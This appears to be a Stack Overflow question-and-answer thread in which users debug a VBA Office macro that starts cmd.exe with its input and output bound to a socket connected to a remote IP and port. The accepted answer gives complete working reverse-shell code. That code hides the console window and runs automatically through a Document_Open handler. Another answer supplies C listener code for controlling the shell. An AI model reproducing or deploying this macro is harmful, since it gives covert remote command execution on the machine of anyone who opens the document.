# VBA CreateProcessA redirect StdIn & StdOut to Socket?

Tags: vba, sockets, winapi, process, createprocess

So I'm trying to write VBA that calls "CreateProcessA" to start the "cmd.exe" process and redirect stdin, stdout, and stderror to a socket that's connected to a remote computer.

At the moment, almost everything seems to be working except the output isn't getting redirected to the socket. When I run the code, it shows on the remote computer that a connection was received, but then the cmd windows just opens on the computer running the VBA and that's it. Anyone know why I'm not able to redirect to the socket? My code is below. Thanks for your help in advance :)

```vb
Const ip = "192.168.43.1"
Const port = "1337"

Const INVALID_SOCKET = -1
Const WSADESCRIPTION_LEN = 256
Const SOCKET_ERROR = -1
Const SD_SEND = 1
Const MAX_PROTOCOL_CHAIN = 7&
Const WSAPROTOCOL_LEN = 255

' Typ definitions ----------------------------------------------------
Private Type WSADATA
    wVersion As Integer
    wHighVersion As Integer
    szDescription(0 To WSADESCRIPTION_LEN) As Byte
    szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
    iMaxSockets As Integer
    iMaxUdpDg As Integer
    lpVendorInfo As Long
End Type

Private Type ADDRINFO
    ai_flags As Long
    ai_family As Long
    ai_socktype As Long
    ai_protocol As Long
    ai_addrlen As Long
    ai_canonName As LongPtr 'strptr
    ai_addr As LongPtr 'p sockaddr
    ai_next As LongPtr 'p addrinfo
End Type

Private Type STARTUPINFOA
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Byte
    hStdInput As LongPtr
    hStdOutput As LongPtr
    hStdError As LongPtr
End Type

Private Type PROCESS_INFORMATION
    hProcess As LongPtr
    hThread As LongPtr
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type WSAPROTOCOLCHAIN
    ChainLen As Long
    ChainEntries(1 To MAX_PROTOCOL_CHAIN) As Long
End Type

Private Type GUID
    Data1 As Long
    Data2 As Integer
    Data3 As Integer
    Data4(7) As Byte
End Type

Private Type WSAPROTOCOL_INFO
    dwServiceFlags1 As Long
    dwServiceFlags2 As Long
    dwServiceFlags3 As Long
    dwServiceFlags4 As Long
    dwProviderFlags As Long
    ProviderId As GUID
    dwCatalogEntryId As Long
    ProtocolChain As WSAPROTOCOLCHAIN
    iVersion As Long
    iAddressFamily As Long
    iMaxSockAddr As Long
    iMinSockAddr As Long
    iSocketType As Long
    iProtocol As Long
    iProtocolMaxOffset As Long
    iNetworkByteOrder As Long
    iSecurityScheme As Long
    dwMessageSize As Long
    dwProviderReserved As Long
    szProtocol(1 To WSAPROTOCOL_LEN + 1) As Byte
End Type

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As LongPtr
    bInheritHandle As Long
End Type
' Enums ---------------------------------------------------------------
Enum af
    AF_UNSPEC = 0
    AF_INET = 2
    AF_IPX = 6
    AF_APPLETALK = 16
    AF_NETBIOS = 17
    AF_INET6 = 23
    AF_IRDA = 26
    AF_BTH = 32
End Enum

Enum sock_type
    SOCK_STREAM = 1
    SOCK_DGRAM = 2
    SOCK_RAW = 3
    SOCK_RDM = 4
    SOCK_SEQPACKET = 5
End Enum
' External functions --------------------------------------------------

Private Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
Private Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongPtr, ByVal SOCKADDR As LongPtr, ByVal namelen As Long) As Long
Private Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()
Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongPtr, lpResult As LongPtr) As Long
Private Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal af As Long, ByVal stype As Long, ByVal protocol As Long) As Long
Private Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As LongPtr) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal buf As String, ByVal buflen As Long, ByVal flags As Long) As Long
Private Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Byte, ByVal buflen As Long, ByVal flags As Long) As Long
Private Declare PtrSafe Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long
Private Declare PtrSafe Function shutdown Lib "ws2_32.dll" (ByVal s As Long, ByVal how As Long) As Long
Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As Long
Private Declare PtrSafe Function CreateProc Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFOA, lpProcessInformation As PROCESS_INFORMATION) As LongPtr
Private Declare PtrSafe Sub ZeroMemory Lib "kernel32" Alias "RtlZeroMemory" (Destination As STARTUPINFOA, ByVal Length As Long)
Private Declare PtrSafe Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal t As Long, ByVal protocol As Long, lpProtocolInfo As LongPtr, ByVal g As Long, ByVal dwFlags As Long) As Long

Function revShell()
    Dim m_wsaData As WSADATA
    Dim m_RetVal As Integer
    Dim m_Hints As ADDRINFO
    Dim m_ConnSocket As LongPtr: m_ConnSocket = INVALID_SOCKET
    Dim pAddrInfo As LongPtr
    Dim RetVal As Long
    Dim lastError As Long
    Dim iRC As Long
    Dim MAX_BUF_SIZE As Integer: MAX_BUF_SIZE = 512
    Dim protoInfo As WSAPROTOCOL_INFO

    'Socket Settings
    RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData)
    If (RetVal <> 0) Then
        MsgBox "WSAStartup failed with error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If
    
    m_Hints.ai_family = af.AF_UNSPEC
    m_Hints.ai_socktype = sock_type.SOCK_STREAM

    RetVal = GetAddrInfo(ip, port, VarPtr(m_Hints), pAddrInfo)
    If (RetVal <> 0) Then
        MsgBox "Cannot resolve address " & ip & " and port " & port & ", error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If

    m_Hints.ai_next = pAddrInfo
    Dim connected As Boolean: connected = False
    Do While m_Hints.ai_next > 0
        CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints)

        m_ConnSocket = WSASocketA(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol, 0, 0, 0)

        If (m_ConnSocket = INVALID_SOCKET) Then
            MsgBox "Error opening socket, error " & RetVal & WSAGetLastError()
        Else
            Dim connectionResult As Long

            connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen)

            If connectionResult <> SOCKET_ERROR Then
                connected = True
                Exit Do
            End If

            MsgBox ("connect() to socket failed")
            closesocket (m_ConnSocket)
        End If
    Loop

    If Not connected Then
        MsgBox ("Fatal error: unable to connect to the server")
        'MsgBox (WSAGetLastError())
        RetVal = closesocket(m_ConnSocket)
        Call WSACleanup
        Exit Function
    End If
    
    Dim secAttrPrc As SECURITY_ATTRIBUTES
    secAttrPrc.nLength = Len(secAttrPrc)
    Dim secAttrThr As SECURITY_ATTRIBUTES
    secAttrThr.nLength = Len(secAttrThr)
    
    Dim si As STARTUPINFOA
    ZeroMemory si, Len(si)
    si.cb = Len(si)
    si.dwFlags = &H100
    si.hStdInput = m_ConnSocket
    si.hStdOutput = m_ConnSocket
    si.hStdError = m_ConnSocket
    Dim pi As PROCESS_INFORMATION
    Dim worked As LongPtr
    Dim test As Long
    worked = CreateProc(vbNullString, "cmd.exe", secAttrPrc, secAttrThr, True, 0, 0, Environ("USERPROFILE"), si, pi)
    'MsgBox (worked)
    If worked Then
        MsgBox ("Worked!")
    Else
        MsgBox ("Didn't work")
    End If
End Function
```

Comment: Where is `ws_socket` declared/implemented?  `WSASocket()` takes 6 parameters, but this code is passing only 3.  See [Redirect IO of process to Windows socket](https://stackoverflow.com/questions/4993119) for how to do `CreateProcess()` redirection with a socket.

Comment: @RemyLebeau Sorry, I only added what I thought were the relevant parts of the code. Just updated to include everything. I'm using ws2_32's socket() function, not WSASocket().

Comment: Per [this answer](https://stackoverflow.com/a/5725609/65863), you can't use `socket()` with `CreateProcess()` I/O redirection, you need to use `WSASocket()` instead so you can *disable* the `WSA_FLAG_OVERLAPPED` option (which `socket()` *enables*). `CreateProcess()` I/O redirection does not work with overlapped I/O objects.

Comment: @RemyLebeau I'll give that a try, thank you!

Comment: @RemyLebeau So I replaced the call to ws_socket with a call to WSASocketA, and now I can't get connection back to the remote machine at all. I've updated the code above to reflect the changes I've made. Any ideas?

Comment: "*I can't get connection back to the remote machine at all*" - Why not? What is the actual problem? Please be more specific. Is `WSASocketA()` or `connect()` failing? What error code does `WSAGetLastError()` report?

Comment: @RemyLebeau The problem is with `WSASocketA()`, because it's returning INVALID_SOCKET. `WSAGetLastError()` returns 0, but apparently that's because `WSAGetLastError()` is notoriously broken in VBA.

Answer (score 0, accepted):

Ok, so I finally got it working. I was having a few issues that I was able to fix thanks to some of the users in this thread. First, I had to use `WSASocketA()` instead of `socket()` because you can't redirect process IO to sockets created with `socket()`. The other issues I was having was with type mismatching between VBA and C-types. Below is the updated code and here's a link to the github with the code as well: https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell

```vb
Const ip = "192.168.43.1"
Const port = "1337"

Const INVALID_SOCKET = -1
Const WSADESCRIPTION_LEN = 256
Const SOCKET_ERROR = -1

Private Type WSADATA
    wVersion As Integer
    wHighVersion As Integer
    szDescription(0 To WSADESCRIPTION_LEN) As Byte
    szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
    iMaxSockets As Integer
    iMaxUdpDg As Integer
    lpVendorInfo As Long
End Type

Private Type ADDRINFO
    ai_flags As Long
    ai_family As Long
    ai_socktype As Long
    ai_protocol As Long
    ai_addrlen As Long
    ai_canonName As LongPtr
    ai_addr As LongPtr
    ai_next As LongPtr
End Type

Private Type STARTUPINFOA
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As String
    hStdInput As LongPtr
    hStdOutput As LongPtr
    hStdError As LongPtr
End Type

Private Type PROCESS_INFORMATION
    hProcess As LongPtr
    hThread As LongPtr
    dwProcessId As Long
    dwThreadId As Long
End Type

Enum af
    AF_UNSPEC = 0
    AF_INET = 2
    AF_IPX = 6
    AF_APPLETALK = 16
    AF_NETBIOS = 17
    AF_INET6 = 23
    AF_IRDA = 26
    AF_BTH = 32
End Enum

Enum sock_type
    SOCK_STREAM = 1
    SOCK_DGRAM = 2
    SOCK_RAW = 3
    SOCK_RDM = 4
    SOCK_SEQPACKET = 5
End Enum

Private Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
Private Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongPtr, ByVal SOCKADDR As LongPtr, ByVal namelen As Long) As Long
Private Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()
Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongPtr, lpResult As LongPtr) As Long
Private Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As LongPtr) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long
Private Declare PtrSafe Function CreateProc Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFOA, lpProcessInformation As PROCESS_INFORMATION) As LongPtr
Private Declare PtrSafe Sub ZeroMemory Lib "kernel32" Alias "RtlZeroMemory" (Destination As STARTUPINFOA, ByVal Length As Long)
Private Declare PtrSafe Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal t As Long, ByVal protocol As Long, lpProtocolInfo As Any, ByVal g As Long, ByVal dwFlags As Long) As Long

Function revShell()
    Dim m_wsaData As WSADATA
    Dim m_RetVal As Integer
    Dim m_Hints As ADDRINFO
    Dim m_ConnSocket As LongPtr: m_ConnSocket = INVALID_SOCKET
    Dim pAddrInfo As LongPtr
    Dim RetVal As Long
    Dim lastError As Long
    Dim iRC As Long
    Dim MAX_BUF_SIZE As Integer: MAX_BUF_SIZE = 512

    RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData)
    If (RetVal <> 0) Then
        MsgBox "WSAStartup failed with error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If
    
    m_Hints.ai_family = af.AF_UNSPEC
    m_Hints.ai_socktype = sock_type.SOCK_STREAM

    RetVal = GetAddrInfo(ip, port, VarPtr(m_Hints), pAddrInfo)
    If (RetVal <> 0) Then
        MsgBox "Cannot resolve address " & ip & " and port " & port & ", error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If

    m_Hints.ai_next = pAddrInfo
    Dim connected As Boolean: connected = False
    Do While m_Hints.ai_next > 0
        CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints)

        m_ConnSocket = WSASocketA(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol, ByVal 0&, 0, 0)
        
        If (m_ConnSocket = INVALID_SOCKET) Then
            revShell = False
        Else
            Dim connectionResult As Long

            connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen)

            If connectionResult <> SOCKET_ERROR Then
                connected = True
                Exit Do
            End If
            
            closesocket (m_ConnSocket)
            revShell = False
        End If
    Loop

    If Not connected Then
        revShell = False
        RetVal = closesocket(m_ConnSocket)
        Call WSACleanup
        Exit Function
    End If
    
    Dim si As STARTUPINFOA
    ZeroMemory si, Len(si)
    si.cb = Len(si)
    si.dwFlags = &H100
    si.hStdInput = m_ConnSocket
    si.hStdOutput = m_ConnSocket
    si.hStdError = m_ConnSocket
    Dim pi As PROCESS_INFORMATION
    Dim worked As LongPtr
    Dim test As Long
    worked = CreateProc(vbNullString, "cmd", ByVal 0&, ByVal 0&, True, &H8000000, 0, vbNullString, si, pi)
    revShell = worked
End Function

Public Function MAKEWORD(Lo As Byte, Hi As Byte) As Integer
    MAKEWORD = Lo + Hi * 256& Or 32768 * (Hi > 127)
End Function

Private Sub Document_Open()
    Dim success As Boolean
    success = revShell()
End Sub
```

Answer (score 1):

I can get it work with msdn sample: [Server](https://learn.microsoft.com/en-us/windows/win32/winsock/complete-server-code) and [Client](https://learn.microsoft.com/en-us/windows/win32/winsock/complete-client-code)(Added create cmd process in it).

And I can also reproduce this issue with you sample in VBA. When I use the `WSASocketA` you defined, I get Compile error at `lpProtocolInfo As WSAPROTOCOL_INFOA`

> Compile error: ByRef argument type mismatch

Since it is a pointer type, I modify it as `ByVal lpProtocolInfo As LongPtr`.

**More importantly**, you've `ZeroMemory` the `STARTUPINFO` after you set it, and then all the handles you set will be discarded.
Put the initialization at the beginning:

```
Dim si As STARTUPINFOA
ZeroMemory si, Len(si)
si.cb = Len(si)
si.dwFlags = &H100
si.hStdInput = m_ConnSocket
si.hStdOutput = m_ConnSocket
si.hStdError = m_ConnSocket
```

Then it works for me.

UPDATE:

`lpProtocolInfo As LongPtr` You did not add `ByVal` in your updated code, and then I can use it to work.

> There is not enough space on the disk

This may be related to the string processing in your server side. You need to add the suffix "\r\n" to the cmd string you send. I use the Server sample on msdn, and modify the `do-while{}` part:

```
do {
    Sleep(1000);
    iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);
    if (iResult > 0) {
        recvbuf[iResult] = L'\0';
        printf("%s", recvbuf);
    }
    char sendcmd[512] = { 0 };
    fgets(sendcmd, 512, stdin);
    int len = strlen(sendcmd); // "test\n"
    sendcmd[len - 1] = '\r'; //"test\r"
    sendcmd[len] = '\n';    //"test\r\n"
    iSendResult = send(ClientSocket, sendcmd, len+1, 0); //without '\0'
    if (iSendResult == SOCKET_ERROR) {
        printf("send failed with error: %d\n", WSAGetLastError());
        closesocket(ClientSocket);
        WSACleanup();
        return 1;
    }
    if (strncmp(sendcmd, "exit", 4) == 0)
        break;
} while (iResult > 0);
```

In addition, you can specify [`CREATE_NO_WINDOW`](https://learn.microsoft.com/en-us/windows/win32/procthread/process-creation-flags) for `CreateProcess`, so that cmd windows are not created on the client side.

Result(I test it in localhost:127.0.0.1):
[image]

Comment: What are you passing into `WSASocketA()`? Because I'm still getting `INVALID_SOCKET` when using it. Thanks for pointing out the `ZeroMemory` bug!

Comment: The same as you: `m_ConnSocket = WSASocketA(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol, 0, 0, 0)`. For others, I just modify the values of ip and port

Comment: I updated my code above, is that exactly how you have it? Because at the moment, I'm still not getting a connection and `WSASocketA` is still returning `INVALID_SOCKET`

Comment: Ok so I got `WSASocketA` to work and now i'm receiving a connection. However, on the VBA side, a cmd window opens up and says `The handle is invalid`, but I can actually run commands from the remote computer, like execute `calc.exe` and that actually works! But I can't receive any output. If I run `dir`, it says on the VBA side in the cmd window `There is not enough space on the disk`. Any idea what the issue could be?

Comment: It may be related to the server's handling of strings, see my update.

Comment: Thanks for your help, I actually got it working a few days ago, forgot to update.